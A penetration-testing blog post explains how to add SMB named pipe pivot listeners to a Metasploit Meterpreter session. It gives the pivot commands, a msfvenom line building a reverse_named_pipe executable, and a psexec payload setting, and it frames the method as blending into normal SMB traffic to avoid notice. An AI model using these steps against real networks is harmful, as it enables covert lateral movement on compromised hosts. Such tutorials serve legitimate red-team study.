SMB Named Pipe Pivoting in Meterpreter

October 29, 2018
Written by: Péter Gombos
Back to blog

First published on Medium...

A hidden feature of Metasploit, is the ability to add SMB Named Pipe listeners in a meterpreter session to pivot on an internal network. At least I think it’s hidden, as the only place I’ve found it documented is in the original pull request. While that pull request has all the details that you need to get going, it is not easy to find, and you still have to read OJ’s screenshots to see what you can do. Hopefully, this post will let other people know about this awesome feature, and pop up higher when searching for Metasploit Meterpreter Pivot (rack up that SEO).

What is SMB Named Pipe and Named Pipe Pivot?

Named pipes are similar to open TCP ports, where a client can connect to a server listening to a given port. A process registers a named pipe endpoint, and connections through SMB to this endpoint are sent to this process.

Pivoting though SMB Named Pipes has been a feature of Cobalt Strike for years now, but landed in Meterpreter just last year. In the same way as a port forward pivot is set up, your meterpreter session registers a named pipe, and listens to connections to this. After it has been configured, your meterpreter session acts as a listener for SMB connections.

The main reason for using a named pipe pivot is that the connection is SMB instead of HTTP/HTTPS. In a Windows environment, there are a lot of SMB connections going around, and establishing SMB traffic between two clients might not be suspicious. On the other hand, setting up a HTTP server could raise eyebrows. You might also see networks where most ports between clients have been blocked, but port 445 and SMB is still allowed.

How do I set up a named pipe pivot listener?

In an existing meterpreter session, run pivot -h to bring up the help for pivoting. To create a listener, run pivot add -t pipe -l PIPEHOST -n PIPENAME -a <x86 or x64> -p windows. Pipehost is the compromised machine’s IP and pipename is some identifier you choose. The examples use msf-pipe, but I would suggest using something that is trying to blend in a bit. It supports both x86 and x64 payloads. For now, the only supported type (-t) is pipe, and the only platform (-p) is Windows.

After running that command, run pivot list to see all the pivot points that are configured. If you need to remove the listener, just type pivot remove -i <ID> where ID is a hash listed in the list.

What actually happens here is that you set up a stager within the meterpreter session. When your session connects back to your meterpreter pivot listener, the stage is sent by the meterpreter stager, not a stager running on you metasploit server. This is why you have to specify your arch and platform when setting up the listener.

How do I use the pivot?

In the same way that a regular listener is set up. You can generate payloads with msfvenom, for instance:

msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST= PIPENAME=msf-pipe -f exe -o pipe.exe

You can also use the payload option in exploit modules, for instance in exploit/windows/smb/psexec_psh:

set payload windows/x64/meterpreter/reverse_named_pipe

Set all the other options, and fire away.

In conclusion

Named pipes are awesome, and a great addition to meterpreter. I hope you can use them for great success.

Thank you, OJ, for adding this feature, and for making me aware of it through your streams!